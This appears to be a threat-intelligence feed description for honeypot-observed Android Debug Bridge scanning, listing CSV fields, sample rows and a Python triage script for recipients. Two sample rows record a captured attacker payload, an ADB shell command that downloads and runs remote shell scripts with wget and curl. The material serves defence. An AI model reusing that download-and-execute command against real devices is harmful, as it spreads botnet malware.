HIGH: Honeypot ADB Scanner Events Report

DESCRIPTION LAST UPDATED: 2024-01-03

DEFAULT SEVERITY LEVEL: HIGH

This report identifies hosts that have been observed performing scanning activity against Android Debug Bridge (ADB) aware sensors (honeypots).

ADB is a frequent attack vector abused by botnets and other threat actors. If you receive a report from us about an IP observed scanning ADB, please make sure to investigate.

For a detailed description of the protocol please reference the writeup here.

Track ADB scans seen by us on the Dashboard, for example here.

Severity levels are described here.

File name: event4_honeypot_adb_scan

Fields

  • timestamp
    Timestamp when the IP was seen in UTC+0
  • protocol
    Packet type of the connection traffic (UDP/TCP)
  • src_ip
    The IP of the device in question
  • src_port
    Source port of the IP connection
  • src_asn
    ASN of the source IP
  • src_geo
    Country of the source IP
  • src_region
    Region of the source IP
  • src_city
    City of the source IP
  • src_hostname
    Reverse DNS of the source IP
  • src_naics
    North American Industry Classification System Code
  • src_sector
    Sector to which the IP in question belongs; e.g. Communications, Commercial
  • device_vendor
    Source device vendor
  • device_type
    Source device type
  • device_model
    Source device model
  • severity
    Severity level
  • dst_ip
    Destination IP
  • dst_port
    Destination port of the IP connection
  • dst_asn
    ASN of the destination IP
  • dst_geo
    Country of the destination IP
  • dst_region
    Region of the destination IP
  • dst_city
    City of the destination IP
  • dst_hostname
    Reverse DNS of the destination IP
  • dst_naics
    North American Industry Classification System Code
  • dst_sector
    Sector to which the IP in question belongs; e.g. Communications, Commercial
  • public_source
    Source of the event data
  • infection
    Description of the malware/infection
  • family
    Malware family or campaign associated with the event
  • tag
    Event attributes
  • application
    Application name associated with the event
  • version
    Software version associated with the event
  • event_id
    Unique identifier assigned to the source IP or event
  • vulnerability_enum
    Vulnerability or exploit schema being used, for example CVE or EDB
  • vulnerability_id
    Id of vulnerability or exploit, for example CVE-2020-5902
  • vulnerability_class
    If set, then CVSS
  • vulnerability_score
    CVSS base score
  • vulnerability_severity
    CVSS severity, for example, CRITICAL or HIGH
  • vulnerability_version
    CVSS version of framework used, for example 3.1 or 3.0
  • threat_framework
    Set to MITRE ATT&CK
  • threat_tactic_id
    Array of tactic ids, example TA0001;TA0002
  • threat_technique_id
    Array of technique ids, example T1190;T1059
  • target_vendor
    Vendor that is being targeted, example Linksys
  • target_product
    Product that is being targeted, example Linksys E-Series
  • target_class
    Class of device/software being targeted, for example router
  • banner
    Part of system identity string
  • commands
    For example, CONNECT, OPEN
  • maxdata
    Maxdata declares the maximum message body size that the remote system is willing to accept
  • system_type
    System type
  • opened
    Message payload

Sample

"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","severity","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id","vulnerability_enum","vulnerability_id","vulnerability_class","vulnerability_score","vulnerability_severity","vulnerability_version","threat_framework","threat_tactic_id","threat_technique_id","target_vendor","target_product","target_class","banner","commands","maxdata","system_type","opened"
"2010-02-10 00:00:00",tcp,192.168.0.1,60806,64512,ZZ,Region,City,node01.example.com,0,,,,,high,172.16.0.1,5555,65534,ZZ,Region,City,node01.example.net,0,,,adb-scan,,,adb,16777217,,,,,,,,,,,,,,"features=shell_v2,cmd,stat_v2,ls_v2,fixed_push_mkdir,apex,abb,fixed_push_symlink_timestamp,abb_exec,remount_shell,track_app,sendrecv_v2,sendrecv_v2_brotli,sendrecv_v2_lz4,sendrecv_v2_zstd,sendrecv_v2_dry_run_send,openscreen_mdns",,1048576,host,
"2010-02-10 00:00:01",tcp,192.168.0.2,38580,64512,ZZ,Region,City,node02.example.com,0,,,,,high,172.16.0.2,5555,65534,ZZ,Region,City,node02.example.net,0,,,adb-scan,,,adb,16777216,,,,,,,,,,,,,,"features=cmd,shell_v2",,262144,host,"shell:cd /data/local/tmp/;busybox wget http://192.168.0.4//w.sh; sh w.sh; curl http://192.168.0.4//c.sh; sh c.sh; wget http://192.168.0.4//wget.sh; sh wget.sh; curl http://192.168.0.4//wget.sh; sh wget.sh; busybox wget http://192.168.0.4//wget.sh; sh wget.sh; busybox curl http://192.168.0.4//wget.sh; sh wget.sh"
"2010-02-10 00:00:02",tcp,192.168.0.3,36790,64512,ZZ,Region,City,node03.example.com,0,,,,,high,172.16.0.3,5555,65534,ZZ,Region,City,node03.example.net,0,,,adb-scan,,,adb,16777216,,,,,,,,,,,,,,"features=cmd,shell_v2",,262144,host,"shell:cd /data/local/tmp/;busybox wget http://192.168.0.4//w.sh; sh w.sh; curl http://192.168.0.4/c.sh; sh c.sh; wget http://192.168.0.4//wget.sh; sh wget.sh; curl http://192.168.0.4//wget.sh; sh wget.sh; busybox wget http://192.168.0.4/wget.sh; sh wget.sh; busybox curl http://192.168.0.4//wget.sh; sh wget.sh"
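
One way a report recipient could triage this CSV is shown below. It is an added example, not code from the report's publisher. The function name triage, the own_networks parameter and the URL pattern are assumptions, and the embedded rows are constructed from the sample above using only a subset of the columns.

```python
import csv
import io
import ipaddress
import re
from collections import defaultdict

# Assumption: download locations in the "opened" payload appear as plain http(s) URLs.
URL_RE = re.compile(r"https?://[^\s;\"']+")

# Constructed sample: subset of the report columns, values modelled on the page's sample.
SAMPLE = '''"timestamp","protocol","src_ip","src_port","severity","dst_ip","dst_port","infection","banner","maxdata","system_type","opened"
"2010-02-10 00:00:00",tcp,192.168.0.1,60806,high,172.16.0.1,5555,adb-scan,"features=cmd,shell_v2",1048576,host,
"2010-02-10 00:00:01",tcp,192.168.0.2,38580,high,172.16.0.2,5555,adb-scan,"features=cmd,shell_v2",262144,host,"shell:cd /data/local/tmp/;busybox wget http://192.168.0.4//w.sh; sh w.sh"
"2010-02-10 00:00:05",tcp,192.168.0.2,38581,high,172.16.0.3,5555,adb-scan,"features=cmd,shell_v2",262144,host,"shell:curl http://192.168.0.4/c.sh; sh c.sh"
"2010-02-10 00:00:09",tcp,10.9.9.9,40000,high,172.16.0.4,5555,adb-scan,"features=cmd",262144,host,
'''


def triage(report_text, own_networks):
    """Group report rows by src_ip, keeping only sources inside own_networks (CIDRs)."""
    nets = [ipaddress.ip_network(n) for n in own_networks]
    hosts = defaultdict(lambda: {"events": 0, "first_seen": None, "last_seen": None,
                                 "sent_payload": False, "urls": set()})
    for row in csv.DictReader(io.StringIO(report_text)):
        try:
            ip = ipaddress.ip_address(row.get("src_ip") or "")
        except ValueError:
            continue  # skip malformed rows instead of aborting the whole report
        if not any(ip in net for net in nets):
            continue  # source is not one of our addresses
        host = hosts[str(ip)]
        host["events"] += 1
        ts = row.get("timestamp") or ""
        # "YYYY-MM-DD HH:MM:SS" strings sort chronologically as text.
        host["first_seen"] = min(host["first_seen"] or ts, ts)
        host["last_seen"] = max(host["last_seen"] or ts, ts)
        opened = row.get("opened") or ""
        if opened:
            # A non-empty "opened" means the source went beyond probing and sent a payload.
            host["sent_payload"] = True
            host["urls"].update(URL_RE.findall(opened))
    return dict(hosts)


if __name__ == "__main__":
    for ip, info in sorted(triage(SAMPLE, ["192.168.0.0/24"]).items()):
        print(ip, info["events"], info["sent_payload"], sorted(info["urls"]))
```

Hosts with sent_payload set are the ones to prioritise for investigation; the extracted URLs can be checked against proxy and DNS logs for the same source address.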
